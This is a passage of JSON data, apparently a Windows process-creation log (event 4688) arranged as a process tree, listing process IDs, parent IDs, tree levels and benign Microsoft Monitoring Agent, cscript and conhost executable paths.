",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\"],\"IsBranch\":[false,false,true,false,false,false,false,true,false,false,false,true,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,true,false,false,true,false,false,false,false,true,false,false,false,true,false,false,false,false,true,false,false,false,true,false,true,false,false,false,true,false,false,false,false,true,false,false,false,true,false,false,false,true,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,false,true,false,false,false,false,true,false,false,false,false,true,false,false,false,true,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,false,true,false,false,false,false,true,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,true,false,true,false,false,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,true,false,false,false,false,true,false,false,false,true,false,false,false,false,true,false,true,false,true,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,true,false,false,true,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,true,false,false,false,false,false,false,false,false,false,true,true,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,true,false,false,true,false,false],\"IsLeaf\":[false,true,false,true,true,true,true,false,true,true,true,false,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,false,true,true,false,true,true,true,true,false,true,true,true,false,true,true,true,true,false,true,true,true,false,true,false,true,true,true,false,true,true,true,true,false,true,true,true,false,true,true,true,false,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,true,false,true,true,true,true,false,true,true,true,true,false,true,true,true,false,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,true,false,true,true,true,true,false,true,true,true,false,true,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,false,true,true,true,false,true,false,true,true,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,false,true,true,true,true,false,true,true,true,false,true,true,true,true,false,true,false,true,false,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,true,true,false,true,true,false,true,true,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,false,true,true,true,true,true,true,true,true,true,false,false,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,false,false,true,false,true,false,false,true,true],\"IsRoot\":[true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,true,false,false,false,false,true,false,false,false],\"Level\":[1,2,2,3,2,2,2,2,3,2,2,2,3,2,3,2,2,2,3,2,2,2,3,2,2,2,3,2,2,2,3,2,2,3,2,2,3,2,2,2,2,3,2,2,2,3,2,2,2,2,3,2,2,2,3,2,3,2,2,2,3,2,2,2,2,3,2,2,2,3,2,2,2,3,2,2,3,2,2,2,3,2,2,2,3,2,2,2,3,2,2,2,3,2,2,2,2,3,2,2,2,2,3,2,2,2,2,3,2,2,2,3,2,3,2,2,2,3,2,2,2,3,2,2,2,3,2,2,2,3,2,2,2,2,3,2,2,2,2,3,2,2,2,3,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,3,3,3,3,4,3,4,3,3,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,5,5,3,3,3,4,3,3,3,4,3,3,3,3,4,3,4,3,4,3,3,3,3,3,3,3,3,3,3,4,3,3,3,3,3,3,4,3,3,4,3,3,4,3,3,3,3,3,3,3,3,3,3,3,3,3,3,4,3,4,3,3,3,3,3,3,3,3,3,4,5,3,4,5,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,1,2,2,2,2,1,2,3,3,4,1,2,3,3],\"NewProcessId\":[\"0x888\",\"0x364\",\"0x1c4\",\"0x99c\",\"0x93c\",\"0xfbc\",\"0x244\",\"0x1050\",\"0x690\",\"0x1364\",\"0x8e4\",\"0x10fc\",\"0x1298\",\"0x138c\",\"0x1258\",\"0xf94\",\"0xddc\",\"0xbe8\",\"0x130c\",\"0x1370\",\"0xc18\",\"0xa84\",\"0x1348\",\"0x11b4\",\"0x1148\",\"0x10e0\",\"0x12fc\",\"0x518\",\"0x13b4\",\"0xd64\",\"0xc18\",\"0x108c\",\"0x28c\",\"0x11b4\",\"0xf84\",\"0xd64\",\"0xc18\",\"0x123c\",\"0x10a4\",\"0x1040\",\"0x690\",\"0x11ac\",\"0xc18\",\"0x1284\",\"0xb10\",\"0x2a8\",\"0x544\",\"0x130c\",\"0xc84\",\"0x570\",\"0x28c\",\"0xd14\",\"0xbd8\",\"0x123c\",\"0xcd8\",\"0x894\",\"0xde8\",\"0x1298\",\"0xc84\",\"0x690\",\"0x123c\",\"0xa10\",\"0x2f8\",\"0x13a4\",\"0x11e8\",\"0x364\",\"0x338\",\"0xbdc\",\"0x57c\",\"0x10fc\",\"0x1054\",\"0x638\",\"0x107c\",\"0x1064\",\"0x16c4\",\"0x17fc\",\"0x17f0\",\"0x1404\",\"0x1594\",\"0x1630\",\"0x16a0\",\"0x1658\",\"0x1740\",\"0x1490\",\"0x148c\",\"0x1530\",\"0x7b4\",\"0x1550\",\"0x15d0\",\"0x16d0\",\"0x11a8\",\"0x1610\",\"0x1790\",\"0x1258\",\"0x28c\",\"0xac4\",\"0x364\",\"0x1128\",\"0x13e0\",\"0x12e8\",\"0x11e4\",\"0xa08\",\"0x125c\",\"0x1020\",\"0x1380\",\"0x1254\",\"0x13e4\",\"0x10e4\",\"0xfbc\",\"0xa4\",\"0x11cc\",\"0x99c\",\"0x11b0\",\"0x1d0\",\"0xd14\",\"0x1128\",\"0x13fc\",\"0x123c\",\"0x6bc\",\"0x1388\",\"0xc08\",\"0x364\",\"0x12fc\",\"0x12dc\",\"0xb8\",\"0x11b4\",\"0xbdc\",\"0x54c\",\"0xfbc\",\"0x640\",\"0x13b0\",\"0x13b4\",\"0x1148\",\"0xc08\",\"0x1338\",\"0x6ec\",\"0x6d4\",\"0xd14\",\"0x1094\",\"0x1270\",\"0x6ec\",\"0xaa8\",\"0x138c\",\"0xa60\",\"0x280\",\"0xab8\",\"0xb8\",\"0x7f8\",\"0x1040\",\"0xe34\",\"0x5cc\",\"0xe3c\",\"0xf94\",\"0x10e0\",\"0xb50\",\"0xd04\",\"0x90c\",\"0xb8\",\"0xa10\",\"0x244\",\"0xc54\",\"0x778\",\"0xe68\",\"0xc08\",\"0xd78\",\"0x10c8\",\"0x1434\",\"0x1694\",\"0x1220\",\"0x1414\",\"0x13b4\",\"0xcd8\",\"0xc54\",\"0x10f4\",\"0x5cc\",\"0x90c\",\"0x13a8\",\"0x11c4\",\"0x13e8\",\"0x1338\",\"0x1020\",\"0x1070\",\"0x1320\",\"0xde8\",\"0xb8\",\"0xc10\",\"0x440\",\"0xd14\",\"0xbc8\",\"0x10cc\",\"0x1288\",\"0x3dc\",\"0x2a8\",\"0xa5c\",\"0xfc0\",\"0x10b8\",\"0xcd8\",\"0x12fc\",\"0xc18\",\"0xbb4\",\"0x1274\",\"0x614\",\"0xd10\",\"0x135c\",\"0x103c\",\"0x1014\",\"0xbb4\",\"0x11cc\",\"0x123c\",\"0x132c\",\"0xa08\",\"0x4e8\",\"0x240\",\"0x1450\",\"0x1250\",\"0x1458\",\"0x140c\",\"0x1448\",\"0x142c\",\"0x1498\",\"0x14ac\",\"0x14cc\",\"0x14e0\",\"0x1500\",\"0x1514\",\"0x1534\",\"0x154c\",\"0x156c\",\"0x1580\",\"0x15a0\",\"0x15b4\",\"0x15d4\",\"0x15e8\",\"0x1608\",\"0x161c\",\"0x163c\",\"0x1650\",\"0x1670\",\"0x1684\",\"0x16a4\",\"0x16b8\",\"0x16d8\",\"0x16ec\",\"0x170c\",\"0x1724\",\"0x1744\",\"0x1758\",\"0x1778\",\"0x178c\",\"0x17ac\",\"0x17bc\",\"0x17dc\",\"0x17e4\",\"0x1440\",\"0x1434\",\"0x1424\",\"0x123c\",\"0x240\",\"0x1490\",\"0x1464\",\"0x142c\",\"0x14b0\",\"0x14c0\",\"0x14fc\",\"0x14f0\",\"0x14e8\",\"0x152c\",\"0x1520\",\"0x1514\",\"0x1550\",\"0x1560\",\"0x1584\",\"0x1580\",\"0x15c0\",\"0x1600\",\"0x15f0\",\"0x162c\",\"0x166c\",\"0x1660\",\"0x1658\",\"0x169c\",\"0x168c\",\"0x16c8\",\"0x16fc\",\"0x1700\",\"0x1728\",\"0x1738\",\"0x175c\",\"0x176c\",\"0x17a8\",\"0x17a0\",\"0x17cc\",\"0x17e8\",\"0x143c\",\"0x1064\",\"0x1434\",\"0xbb4\",\"0x1404\",\"0x148c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x1550\",\"0x1560\",\"0x158c\",\"0x15d0\",\"0x15c8\",\"0x15ec\",\"0x15e8\",\"0x1630\",\"0x1668\",\"0x1658\",\"0x1664\",\"0x16d4\",\"0x16c0\",\"0x1704\",\"0x16fc\",\"0x16f4\",\"0x1770\",\"0x1774\",\"0x1728\",\"0x1798\",\"0x1758\",\"0x17a8\",\"0x17f8\",\"0x17cc\",\"0x1414\",\"0x28c\",\"0xc18\",\"0x1404\",\"0x147c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x15b8\",\"0x15d0\",\"0x158c\",\"0x1638\",\"0x1624\",\"0x1628\",\"0x1654\",\"0x169c\",\"0x10f4\",\"0x10cc\",\"0x1694\",\"0xab8\",\"0xd80\",\"0x230\",\"0x90c\",\"0xbdc\",\"0x17c0\",\"0xbdc\",\"0xa40\",\"0x690\",\"0x6d4\",\"0x1388\",\"0x11c8\",\"0x77c\",\"0x132c\",\"0x4e8\",\"0x97c\"],\"NewProcessId_par\":[\"NaN\",\"0x888\",\"0x888\",\"0x1c4\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x1050\",\"0x888\",\"0x888\",\"0x888\",\"0x10fc\",\"0x888\",\"0x138c\",\"0x888\",\"0x888\",\"0x888\",\"0xbe8\",\"0x888\",\"0x888\",\"0x888\",\"0xa84\",\"0x888\",\"0x888\",\"0x888\",\"0x10e0\",\"0x888\",\"0x888\",\"0x888\",\"0xd64\",\"0x888\",\"0x888\",\"0x28c\",\"0x888\",\"0x888\",\"0xd64\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x690\",\"0x888\",\"0x888\",\"0x888\",\"0xb10\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x570\",\"0x888\",\"0x888\",\"0x888\",\"0x123c\",\"0x888\",\"0x894\",\"0x888\",\"0x888\",\"0x888\",\"0x690\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x11e8\",\"0x888\",\"0x888\",\"0x888\",\"0x57c\",\"0x888\",\"0x888\",\"0x888\",\"0x107c\",\"0x888\",\"0x888\",\"0x17fc\",\"0x888\",\"0x888\",\"0x888\",\"0x1630\",\"0x888\",\"0x888\",\"0x888\",\"0x1490\",\"0x888\",\"0x888\",\"0x888\",\"0x1550\",\"0x888\",\"0x888\",\"0x888\",\"0x1610\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x364\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0xa08\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x13e4\",\"0x888\",\"0x888\",\"0x888\",\"0x11cc\",\"0x888\",\"0x11b0\",\"0x888\",\"0x888\",\"0x888\",\"0x13fc\",\"0x888\",\"0x888\",\"0x888\",\"0xc08\",\"0x888\",\"0x888\",\"0x888\",\"0xb8\",\"0x888\",\"0x888\",\"0x888\",\"0xfbc\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0xc08\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x1094\",\"0x888\",\"0x888\",\"0x888\",\"0x138c\",\"NaN\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"0x280\",\"NaN\",\"0x440\",\"0x440\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x2a8\",\"0xbc8\",\"0xfc0\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xc18\",\"0xbc8\",\"0x1274\",\"0xbc8\",\"0xd10\",\"0xbc8\",\"0x103c\",\"0xbc8\",\"0xbb4\",\"0xbc8\",\"0x123c\",\"0xbc8\",\"0xa08\",\"0xbc8\",\"0x240\",\"0xbc8\",\"0x1250\",\"0xbc8\",\"0x140c\",\"0xbc8\",\"0x142c\",\"0xbc8\",\"0x14ac\",\"0xbc8\",\"0x14e0\",\"0xbc8\",\"0x1514\",\"0xbc8\",\"0x154c\",\"0xbc8\",\"0x1580\",\"0xbc8\",\"0x15b4\",\"0xbc8\",\"0x15e8\",\"0xbc8\",\"0x161c\",\"0xbc8\",\"0x1650\",\"0xbc8\",\"0x1684\",\"0xbc8\",\"0x16b8\",\"0xbc8\",\"0x16ec\",\"0xbc8\",\"0x1724\",\"0xbc8\",\"0x1758\",\"0xbc8\",\"0x178c\",\"0x17ac\",\"0x17ac\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1434\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1490\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x14fc\",\"0xbc8\",\"0x14e8\",\"0xbc8\",\"0x1520\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1660\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1728\",\"0xbc8\",\"0xbc8\",\"0x176c\",\"0xbc8\",\"0xbc8\",\"0x17cc\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1550\",\"0xbc8\",\"0x158c\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x16c0\",\"0x1704\",\"0xbc8\",\"0x16f4\",\"0x1770\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x440\",\"0x440\",\"0x440\",\"0x440\",\"0x440\",\"NaN\",\"0x230\",\"0x230\",\"0x230\",\"0x230\",\"NaN\",\"0xa40\",\"0x690\",\"0x690\",\"0x1388\",\"NaN\",\"0x77c\",\"0x132c\",\"0x132c\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft 